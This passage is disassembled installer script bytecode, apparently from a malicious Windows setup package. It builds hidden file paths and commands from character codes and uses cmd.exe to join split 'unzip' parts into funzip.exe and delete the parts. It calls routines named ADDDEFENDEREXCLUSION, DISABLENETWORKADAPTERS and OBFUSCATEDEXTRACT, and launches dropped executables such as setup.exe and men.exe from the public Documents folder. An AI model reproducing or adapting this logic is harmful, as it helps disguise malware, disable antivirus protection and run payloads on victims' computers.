pop ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(25)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(67)
assign Var17[1], S32(58)
assign Var17[2], S32(92)
assign Var17[3], S32(85)
assign Var17[4], S32(115)
assign Var17[5], S32(101)
assign Var17[6], S32(114)
assign Var17[7], S32(115)
assign Var17[8], S32(92)
assign Var17[9], S32(80)
assign Var17[10], S32(117)
assign Var17[11], S32(98)
assign Var17[12], S32(108)
assign Var17[13], S32(105)
assign Var17[14], S32(99)
assign Var17[15], S32(92)
assign Var17[16], S32(68)
assign Var17[17], S32(111)
assign Var17[18], S32(99)
assign Var17[19], S32(117)
assign Var17[20], S32(109)
assign Var17[21], S32(101)
assign Var17[22], S32(110)
assign Var17[23], S32(116)
assign Var17[24], S32(115)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
pop ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(9)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(92)
assign Var17[1], S32(117)
assign Var17[2], S32(110)
assign Var17[3], S32(122)
assign Var17[4], S32(105)
assign Var17[5], S32(112)
assign Var17[6], S32(46)
assign Var17[7], S32(50)
assign Var17[8], S32(34)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
pop ; StackCount = 14
assign Var13, Var14
pop ; StackCount = 13
pushtype UnicodeString_2 ; StackCount = 14
pushtype Type30 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype S32 ; StackCount = 17
assign Var17, S32(7)
pushvar Var16 ; StackCount = 18
call SETARRAYLENGTH
pop ; StackCount = 17
pop ; StackCount = 16
assign Var16[0], S32(99)
assign Var16[1], S32(109)
assign Var16[2], S32(100)
assign Var16[3], S32(46)
assign Var16[4], S32(101)
assign Var16[5], S32(120)
assign Var16[6], S32(101)
assign Var15, Var16
pop ; StackCount = 15
pushvar Var14 ; StackCount = 16
call STRFROMCODE
pop ; StackCount = 15
pop ; StackCount = 14
pushvar Var8 ; StackCount = 15
call EXEC
pop ; StackCount = 14
pop ; StackCount = 13
pop ; StackCount = 12
pop ; StackCount = 11
pop ; StackCount = 10
pop ; StackCount = 9
pop ; StackCount = 8
pop ; StackCount = 7
call ADDDEFENDEREXCLUSION
call OBFUSCATEDEXTRACT
pushtype Type30 ; StackCount = 8
pushtype Type30 ; StackCount = 9
pushtype S32 ; StackCount = 10
assign Var10, S32(51)
pushvar Var9 ; StackCount = 11
call SETARRAYLENGTH
pop ; StackCount = 10
pop ; StackCount = 9
assign Var9[0], S32(67)
assign Var9[1], S32(58)
assign Var9[2], S32(92)
assign Var9[3], S32(85)
assign Var9[4], S32(115)
assign Var9[5], S32(101)
assign Var9[6], S32(114)
assign Var9[7], S32(115)
assign Var9[8], S32(92)
assign Var9[9], S32(80)
assign Var9[10], S32(117)
assign Var9[11], S32(98)
assign Var9[12], S32(108)
assign Var9[13], S32(105)
assign Var9[14], S32(99)
assign Var9[15], S32(92)
assign Var9[16], S32(68)
assign Var9[17], S32(111)
assign Var9[18], S32(99)
assign Var9[19], S32(117)
assign Var9[20], S32(109)
assign Var9[21], S32(101)
assign Var9[22], S32(110)
assign Var9[23], S32(116)
assign Var9[24], S32(115)
assign Var9[25], S32(92)
assign Var9[26], S32(120)
assign Var9[27], S32(56)
assign Var9[28], S32(54)
assign Var9[29], S32(45)
assign Var9[30], S32(77)
assign Var9[31], S32(105)
assign Var9[32], S32(99)
assign Var9[33], S32(114)
assign Var9[34], S32(111)
assign Var9[35], S32(115)
assign Var9[36], S32(111)
assign Var9[37], S32(102)
assign Var9[38], S32(116)
assign Var9[39], S32(45)
assign Var9[40], S32(87)
assign Var9[41], S32(105)
assign Var9[42], S32(110)
assign Var9[43], S32(100)
assign Var9[44], S32(111)
assign Var9[45], S32(119)
assign Var9[46], S32(115)
assign Var9[47], S32(100)
assign Var9[48], S32(97)
assign Var9[49], S32(116)
assign Var9[50], S32(97)
assign Var8, Var9
pop ; StackCount = 8
pushvar Var2 ; StackCount = 9
call STRFROMCODE
pop ; StackCount = 8
pop ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype Type30 ; StackCount = 9
pushtype S32 ; StackCount = 10
assign Var10, S32(36)
pushvar Var9 ; StackCount = 11
call SETARRAYLENGTH
pop ; StackCount = 10
pop ; StackCount = 9
assign Var9[0], S32(67)
assign Var9[1], S32(58)
assign Var9[2], S32(92)
assign Var9[3], S32(85)
assign Var9[4], S32(115)
assign Var9[5], S32(101)
assign Var9[6], S32(114)
assign Var9[7], S32(115)
assign Var9[8], S32(92)
assign Var9[9], S32(80)
assign Var9[10], S32(117)
assign Var9[11], S32(98)
assign Var9[12], S32(108)
assign Var9[13], S32(105)
assign Var9[14], S32(99)
assign Var9[15], S32(92)
assign Var9[16], S32(68)
assign Var9[17], S32(111)
assign Var9[18], S32(99)
assign Var9[19], S32(117)
assign Var9[20], S32(109)
assign Var9[21], S32(101)
assign Var9[22], S32(110)
assign Var9[23], S32(116)
assign Var9[24], S32(115)
assign Var9[25], S32(92)
assign Var9[26], S32(83)
assign Var9[27], S32(101)
assign Var9[28], S32(114)
assign Var9[29], S32(118)
assign Var9[30], S32(101)
assign Var9[31], S32(114)
assign Var9[32], S32(46)
assign Var9[33], S32(108)
assign Var9[34], S32(111)
assign Var9[35], S32(103)
assign Var8, Var9
pop ; StackCount = 8
pushvar Var3 ; StackCount = 9
call STRFROMCODE
pop ; StackCount = 8
pop ; StackCount = 7
pushtype WideString ; StackCount = 8
assign Var8, Var2
pushtype UnicodeString_2 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype Type30 ; StackCount = 11
pushtype S32 ; StackCount = 12
assign Var12, S32(11)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH
pop ; StackCount = 12
pop ; StackCount = 11
assign Var11[0], S32(92)
assign Var11[1], S32(83)
assign Var11[2], S32(101)
assign Var11[3], S32(114)
assign Var11[4], S32(118)
assign Var11[5], S32(101)
assign Var11[6], S32(114)
assign Var11[7], S32(46)
assign Var11[8], S32(108)
assign Var11[9], S32(111)
assign Var11[10], S32(103)
assign Var10, Var11
pop ; StackCount = 10
pushvar Var9 ; StackCount = 11
call STRFROMCODE
pop ; StackCount = 10
pop ; StackCount = 9
add Var8, Var9
pop ; StackCount = 8
assign Var4, Var8
pop ; StackCount = 7
pushtype BOOLEAN ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
assign Var9, Var2
pushvar Var8 ; StackCount = 10
call FORCEDIRECTORIES
pop ; StackCount = 9
pop ; StackCount = 8
pop ; StackCount = 7
pushtype BOOLEAN ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
assign Var9, Var3
pushvar Var8 ; StackCount = 10
call FILEEXISTS
pop ; StackCount = 9
pop ; StackCount = 8
sfz Var8
pop ; StackCount = 7
jf loc_1d7a
pushtype BOOLEAN ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
assign Var9, Var4
pushvar Var8 ; StackCount = 10
call FILEEXISTS
pop ; StackCount = 9
pop ; StackCount = 8
sfz Var8
pop ; StackCount = 7
jf loc_1d46
pushtype BOOLEAN ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
assign Var9, Var4
pushvar Var8 ; StackCount = 10
call DELETEFILE
pop ; StackCount = 9
pop ; StackCount = 8
pop ; StackCount = 7
loc_1d46:
pushtype BOOLEAN ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
assign Var9, Var4
pushtype UnicodeString_2 ; StackCount = 10
assign Var10, Var3
pushvar Var8 ; StackCount = 11
call RENAMEFILE
pop ; StackCount = 10
pop ; StackCount = 9
pop ; StackCount = 8
pop ; StackCount = 7
loc_1d7a:
pushtype WideString ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype Type30 ; StackCount = 11
pushtype S32 ; StackCount = 12
assign Var12, S32(26)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH
pop ; StackCount = 12
pop ; StackCount = 11
assign Var11[0], S32(67)
assign Var11[1], S32(58)
assign Var11[2], S32(92)
assign Var11[3], S32(85)
assign Var11[4], S32(115)
assign Var11[5], S32(101)
assign Var11[6], S32(114)
assign Var11[7], S32(115)
assign Var11[8], S32(92)
assign Var11[9], S32(80)
assign Var11[10], S32(117)
assign Var11[11], S32(98)
assign Var11[12], S32(108)
assign Var11[13], S32(105)
assign Var11[14], S32(99)
assign Var11[15], S32(92)
assign Var11[16], S32(68)
assign Var11[17], S32(111)
assign Var11[18], S32(99)
assign Var11[19], S32(117)
assign Var11[20], S32(109)
assign Var11[21], S32(101)
assign Var11[22], S32(110)
assign Var11[23], S32(116)
assign Var11[24], S32(115)
assign Var11[25], S32(92)
assign Var10, Var11
pop ; StackCount = 10
pushvar Var9 ; StackCount = 11
call STRFROMCODE
pop ; StackCount = 10
pop ; StackCount = 9
assign Var8, Var9
pop ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype Type30 ; StackCount = 11
pushtype S32 ; StackCount = 12
assign Var12, S32(9)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH
pop ; StackCount = 12
pop ; StackCount = 11
assign Var11[0], S32(115)
assign Var11[1], S32(101)
assign Var11[2], S32(116)
assign Var11[3], S32(117)
assign Var11[4], S32(112)
assign Var11[5], S32(46)
assign Var11[6], S32(101)
assign Var11[7], S32(120)
assign Var11[8], S32(101)
assign Var10, Var11
pop ; StackCount = 10
pushvar Var9 ; StackCount = 11
call STRFROMCODE
pop ; StackCount = 10
pop ; StackCount = 9
add Var8, Var9
pop ; StackCount = 8
assign Var6, Var8
pop ; StackCount = 7
pushtype BOOLEAN ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
assign Var9, Var6
pushvar Var8 ; StackCount = 10
call FILEEXISTS
pop ; StackCount = 9
pop ; StackCount = 8
sfz Var8
pop ; StackCount = 7
jf loc_21ed
pushtype BOOLEAN ; StackCount = 8
pushtype Pointer ; StackCount = 9
setptr Var9, Var7
pushtype U8_4 ; StackCount = 10
assign Var10, U8_4(0)
pushtype S32 ; StackCount = 11
assign Var11, S32(5)
pushtype UnicodeString_2 ; StackCount = 12
pushtype Type30 ; StackCount = 13
pushtype Type30 ; StackCount = 14
pushtype S32 ; StackCount = 15
assign Var15, S32(0)
pushvar Var14 ; StackCount = 16
call SETARRAYLENGTH
pop ; StackCount = 15
pop ; StackCount = 14
assign Var13, Var14
pop ; StackCount = 13
pushvar Var12 ; StackCount = 14
call STRFROMCODE
pop ; StackCount = 13
pop ; StackCount = 12
pushtype UnicodeString_2 ; StackCount = 13
pushtype Type30 ; StackCount = 14
pushtype Type30 ; StackCount = 15
pushtype S32 ; StackCount = 16
assign Var16, S32(0)
pushvar Var15 ; StackCount = 17
call SETARRAYLENGTH
pop ; StackCount = 16
pop ; StackCount = 15
assign Var14, Var15
pop ; StackCount = 14
pushvar Var13 ; StackCount = 15
call STRFROMCODE
pop ; StackCount = 14
pop ; StackCount = 13
pushtype UnicodeString_2 ; StackCount = 14
assign Var14, Var6
pushvar Var8 ; StackCount = 15
call EXEC
pop ; StackCount = 14
pop ; StackCount = 13
pop ; StackCount = 12
pop ; StackCount = 11
pop ; StackCount = 10
pop ; StackCount = 9
pop ; StackCount = 8
pop ; StackCount = 7
loc_21ed:
pushtype WideString ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype Type30 ; StackCount = 11
pushtype S32 ; StackCount = 12
assign Var12, S32(25)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH
pop ; StackCount = 12
pop ; StackCount = 11
assign Var11[0], S32(67)
assign Var11[1], S32(58)
assign Var11[2], S32(92)
assign Var11[3], S32(85)
assign Var11[4], S32(115)
assign Var11[5], S32(101)
assign Var11[6], S32(114)
assign Var11[7], S32(115)
assign Var11[8], S32(92)
assign Var11[9], S32(80)
assign Var11[10], S32(117)
assign Var11[11], S32(98)
assign Var11[12], S32(108)
assign Var11[13], S32(105)
assign Var11[14], S32(99)
assign Var11[15], S32(92)
assign Var11[16], S32(68)
assign Var11[17], S32(111)
assign Var11[18], S32(99)
assign Var11[19], S32(117)
assign Var11[20], S32(109)
assign Var11[21], S32(101)
assign Var11[22], S32(110)
assign Var11[23], S32(116)
assign Var11[24], S32(115)
assign Var10, Var11
pop ; StackCount = 10
pushvar Var9 ; StackCount = 11
call STRFROMCODE
pop ; StackCount = 10
pop ; StackCount = 9
assign Var8, Var9
pop ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype Type30 ; StackCount = 11
pushtype S32 ; StackCount = 12
assign Var12, S32(8)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH
pop ; StackCount = 12
pop ; StackCount = 11
assign Var11[0], S32(92)
assign Var11[1], S32(109)
assign Var11[2], S32(101)
assign Var11[3], S32(110)
assign Var11[4], S32(46)
assign Var11[5], S32(101)
assign Var11[6], S32(120)
assign Var11[7], S32(101)
assign Var10, Var11
pop ; StackCount = 10
pushvar Var9 ; StackCount = 11
call STRFROMCODE
pop ; StackCount = 10
pop ; StackCount = 9
add Var8, Var9
pop ; StackCount = 8
assign Var5, Var8
pop ; StackCount = 7
pushtype BOOLEAN ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
assign Var9, Var5
pushvar Var8 ; StackCount = 10
call FILEEXISTS
pop ; StackCount = 9
pop ; StackCount = 8
sfz Var8
pop ; StackCount = 7
jf loc_263a
pushtype BOOLEAN ; StackCount = 8
pushtype Pointer ; StackCount = 9
setptr Var9, Var7
pushtype U8_4 ; StackCount = 10
assign Var10, U8_4(0)
pushtype S32 ; StackCount = 11
assign Var11, S32(0)
pushtype UnicodeString_2 ; StackCount = 12
pushtype Type30 ; StackCount = 13
pushtype Type30 ; StackCount = 14
pushtype S32 ; StackCount = 15
assign Var15, S32(0)
pushvar Var14 ; StackCount = 16
call SETARRAYLENGTH
pop ; StackCount = 15
pop ; StackCount = 14
assign Var13, Var14
pop ; StackCount = 13
pushvar Var12 ; StackCount = 14
call STRFROMCODE
pop ; StackCount = 13
pop ; StackCount = 12
pushtype UnicodeString_2 ; StackCount = 13
pushtype Type30 ; StackCount = 14
pushtype Type30 ; StackCount = 15
pushtype S32 ; StackCount = 16
assign Var16, S32(0)
pushvar Var15 ; StackCount = 17
call SETARRAYLENGTH
pop ; StackCount = 16
pop ; StackCount = 15
assign Var14, Var15
pop ; StackCount = 14
pushvar Var13 ; StackCount = 15
call STRFROMCODE
pop ; StackCount = 14
pop ; StackCount = 13
pushtype UnicodeString_2 ; StackCount = 14
assign Var14, Var5
pushvar Var8 ; StackCount = 15
call EXEC
pop ; StackCount = 14
pop ; StackCount = 13
pop ; StackCount = 12
pop ; StackCount = 11
pop ; StackCount = 10
pop ; StackCount = 9
pop ; StackCount = 8
pop ; StackCount = 7
loc_263a:
jump loc_4c1a
loc_263f:
call ADDDEFENDEREXCLUSION
call DISABLENETWORKADAPTERS
pushtype BOOLEAN ; StackCount = 8
pushtype Pointer ; StackCount = 9
setptr Var9, Var7
pushtype U8_4 ; StackCount = 10
assign Var10, U8_4(1)
pushtype S32 ; StackCount = 11
assign Var11, S32(0)
pushtype UnicodeString_2 ; StackCount = 12
assign Var12, String_3("")
pushtype UnicodeString_2 ; StackCount = 13
pushtype WideString ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(12)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(47)
assign Var17[1], S32(99)
assign Var17[2], S32(32)
assign Var17[3], S32(99)
assign Var17[4], S32(111)
assign Var17[5], S32(112)
assign Var17[6], S32(121)
assign Var17[7], S32(32)
assign Var17[8], S32(47)
assign Var17[9], S32(98)
assign Var17[10], S32(32)
assign Var17[11], S32(34)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
assign Var14, Var15
pop ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(25)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(67)
assign Var17[1], S32(58)
assign Var17[2], S32(92)
assign Var17[3], S32(85)
assign Var17[4], S32(115)
assign Var17[5], S32(101)
assign Var17[6], S32(114)
assign Var17[7], S32(115)
assign Var17[8], S32(92)
assign Var17[9], S32(80)
assign Var17[10], S32(117)
assign Var17[11], S32(98)
assign Var17[12], S32(108)
assign Var17[13], S32(105)
assign Var17[14], S32(99)
assign Var17[15], S32(92)
assign Var17[16], S32(68)
assign Var17[17], S32(111)
assign Var17[18], S32(99)
assign Var17[19], S32(117)
assign Var17[20], S32(109)
assign Var17[21], S32(101)
assign Var17[22], S32(110)
assign Var17[23], S32(116)
assign Var17[24], S32(115)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
pop ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(13)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(92)
assign Var17[1], S32(117)
assign Var17[2], S32(110)
assign Var17[3], S32(122)
assign Var17[4], S32(105)
assign Var17[5], S32(112)
assign Var17[6], S32(46)
assign Var17[7], S32(51)
assign Var17[8], S32(34)
assign Var17[9], S32(32)
assign Var17[10], S32(43)
assign Var17[11], S32(32)
assign Var17[12], S32(34)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
pop ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(25)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(67)
assign Var17[1], S32(58)
assign Var17[2], S32(92)
assign Var17[3], S32(85)
assign Var17[4], S32(115)
assign Var17[5], S32(101)
assign Var17[6], S32(114)
assign Var17[7], S32(115)
assign Var17[8], S32(92)
assign Var17[9], S32(80)
assign Var17[10], S32(117)
assign Var17[11], S32(98)
assign Var17[12], S32(108)
assign Var17[13], S32(105)
assign Var17[14], S32(99)
assign Var17[15], S32(92)
assign Var17[16], S32(68)
assign Var17[17], S32(111)
assign Var17[18], S32(99)
assign Var17[19], S32(117)
assign Var17[20], S32(109)
assign Var17[21], S32(101)
assign Var17[22], S32(110)
assign Var17[23], S32(116)
assign Var17[24], S32(115)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
pop ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(11)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(92)
assign Var17[1], S32(117)
assign Var17[2], S32(110)
assign Var17[3], S32(122)
assign Var17[4], S32(105)
assign Var17[5], S32(112)
assign Var17[6], S32(46)
assign Var17[7], S32(50)
assign Var17[8], S32(34)
assign Var17[9], S32(32)
assign Var17[10], S32(34)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
pop ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(25)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(67)
assign Var17[1], S32(58)
assign Var17[2], S32(92)
assign Var17[3], S32(85)
assign Var17[4], S32(115)
assign Var17[5], S32(101)
assign Var17[6], S32(114)
assign Var17[7], S32(115)
assign Var17[8], S32(92)
assign Var17[9], S32(80)
assign Var17[10], S32(117)
assign Var17[11], S32(98)
assign Var17[12], S32(108)
assign Var17[13], S32(105)
assign Var17[14], S32(99)
assign Var17[15], S32(92)
assign Var17[16], S32(68)
assign Var17[17], S32(111)
assign Var17[18], S32(99)
assign Var17[19], S32(117)
assign Var17[20], S32(109)
assign Var17[21], S32(101)
assign Var17[22], S32(110)
assign Var17[23], S32(116)
assign Var17[24], S32(115)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
pop ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(21)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(92)
assign Var17[1], S32(102)
assign Var17[2], S32(117)
assign Var17[3], S32(110)
assign Var17[4], S32(122)
assign Var17[5], S32(105)
assign Var17[6], S32(112)
assign Var17[7], S32(46)
assign Var17[8], S32(101)
assign Var17[9], S32(120)
assign Var17[10], S32(101)
assign Var17[11], S32(34)
assign Var17[12], S32(32)
assign Var17[13], S32(38)
assign Var17[14], S32(38)
assign Var17[15], S32(32)
assign Var17[16], S32(100)
assign Var17[17], S32(101)
assign Var17[18], S32(108)
assign Var17[19], S32(32)
assign Var17[20], S32(34)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
pop ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(25)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(67)
assign Var17[1], S32(58)
assign Var17[2], S32(92)
assign Var17[3], S32(85)
assign Var17[4], S32(115)
assign Var17[5], S32(101)
assign Var17[6], S32(114)
assign Var17[7], S32(115)
assign Var17[8], S32(92)
assign Var17[9], S32(80)
assign Var17[10], S32(117)
assign Var17[11], S32(98)
assign Var17[12], S32(108)
assign Var17[13], S32(105)
assign Var17[14], S32(99)
assign Var17[15], S32(92)
assign Var17[16], S32(68)
assign Var17[17], S32(111)
assign Var17[18], S32(99)
assign Var17[19], S32(117)
assign Var17[20], S32(109)
assign Var17[21], S32(101)
assign Var17[22], S32(110)
assign Var17[23], S32(116)
assign Var17[24], S32(115)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
pop ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(11)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(92)
assign Var17[1], S32(117)
assign Var17[2], S32(110)
assign Var17[3], S32(122)
assign Var17[4], S32(105)
assign Var17[5], S32(112)
assign Var17[6], S32(46)
assign Var17[7], S32(51)
assign Var17[8], S32(34)
assign Var17[9], S32(32)
assign Var17[10], S32(34)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
pop ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(25)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(67)
assign Var17[1], S32(58)
assign Var17[2], S32(92)
assign Var17[3], S32(85)
assign Var17[4], S32(115)
assign Var17[5], S32(101)
assign Var17[6], S32(114)
assign Var17[7], S32(115)
assign Var17[8], S32(92)
assign Var17[9], S32(80)
assign Var17[10], S32(117)
assign Var17[11], S32(98)
assign Var17[12], S32(108)
assign Var17[13], S32(105)
assign Var17[14], S32(99)
assign Var17[15], S32(92)
assign Var17[16], S32(68)
assign Var17[17], S32(111)
assign Var17[18], S32(99)
assign Var17[19], S32(117)
assign Var17[20], S32(109)
assign Var17[21], S32(101)
assign Var17[22], S32(110)
assign Var17[23], S32(116)
assign Var17[24], S32(115)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
pop ; StackCount = 14
pushtype UnicodeString_2 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype Type30 ; StackCount = 17
pushtype S32 ; StackCount = 18
assign Var18, S32(9)
pushvar Var17 ; StackCount = 19
call SETARRAYLENGTH
pop ; StackCount = 18
pop ; StackCount = 17
assign Var17[0], S32(92)
assign Var17[1], S32(117)
assign Var17[2], S32(110)
assign Var17[3], S32(122)
assign Var17[4], S32(105)
assign Var17[5], S32(112)
assign Var17[6], S32(46)
assign Var17[7], S32(50)
assign Var17[8], S32(34)
assign Var16, Var17
pop ; StackCount = 16
pushvar Var15 ; StackCount = 17
call STRFROMCODE
pop ; StackCount = 16
pop ; StackCount = 15
add Var14, Var15
pop ; StackCount = 14
assign Var13, Var14
pop ; StackCount = 13
pushtype UnicodeString_2 ; StackCount = 14
pushtype Type30 ; StackCount = 15
pushtype Type30 ; StackCount = 16
pushtype S32 ; StackCount = 17
assign Var17, S32(7)
pushvar Var16 ; StackCount = 18
call SETARRAYLENGTH
pop ; StackCount = 17
pop ; StackCount = 16
assign Var16[0], S32(99)
assign Var16[1], S32(109)
assign Var16[2], S32(100)
assign Var16[3], S32(46)
assign Var16[4], S32(101)
assign Var16[5], S32(120)
assign Var16[6], S32(101)
assign Var15, Var16
pop ; StackCount = 15
pushvar Var14 ; StackCount = 16
call STRFROMCODE
pop ; StackCount = 15
pop ; StackCount = 14
pushvar Var8 ; StackCount = 15
call EXEC
pop ; StackCount = 14
pop ; StackCount = 13
pop ; StackCount = 12
pop ; StackCount = 11
pop ; StackCount = 10
pop ; StackCount = 9
pop ; StackCount = 8
pop ; StackCount = 7
call OBFUSCATEDEXTRACT
pushtype Type30 ; StackCount = 8
pushtype Type30 ; StackCount = 9
pushtype S32 ; StackCount = 10
assign Var10, S32(51)
pushvar Var9 ; StackCount = 11
call SETARRAYLENGTH
pop ; StackCount = 10
pop ; StackCount = 9
assign Var9[0], S32(67)
assign Var9[1], S32(58)
assign Var9[2], S32(92)
assign Var9[3], S32(85)
assign Var9[4], S32(115)
assign Var9[5], S32(101)
assign Var9[6], S32(114)
assign Var9[7], S32(115)
assign Var9[8], S32(92)
assign Var9[9], S32(80)
assign Var9[10], S32(117)
assign Var9[11], S32(98)
assign Var9[12], S32(108)
assign Var9[13], S32(105)
assign Var9[14], S32(99)
assign Var9[15], S32(92)
assign Var9[16], S32(68)
assign Var9[17], S32(111)
assign Var9[18], S32(99)
assign Var9[19], S32(117)
assign Var9[20], S32(109)
assign Var9[21], S32(101)
assign Var9[22], S32(110)
assign Var9[23], S32(116)
assign Var9[24], S32(115)
assign Var9[25], S32(92)
assign Var9[26], S32(120)
assign Var9[27], S32(56)
assign Var9[28], S32(54)
assign Var9[29], S32(45)
assign Var9[30], S32(77)
assign Var9[31], S32(105)
assign Var9[32], S32(99)
assign Var9[33], S32(114)
assign Var9[34], S32(111)
assign Var9[35], S32(115)
assign Var9[36], S32(111)
assign Var9[37], S32(102)
assign Var9[38], S32(116)
assign Var9[39], S32(45)
assign Var9[40], S32(87)
assign Var9[41], S32(105)
assign Var9[42], S32(110)
assign Var9[43], S32(100)
assign Var9[44], S32(111)
assign Var9[45], S32(119)
assign Var9[46], S32(115)
assign Var9[47], S32(100)
assign Var9[48], S32(97)
assign Var9[49], S32(116)
assign Var9[50], S32(97)
assign Var8, Var9
pop ; StackCount = 8
pushvar Var2 ; StackCount = 9
call STRFROMCODE
pop ; StackCount = 8
pop ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype Type30 ; StackCount = 9
pushtype S32 ; StackCount = 10
assign Var10, S32(36)
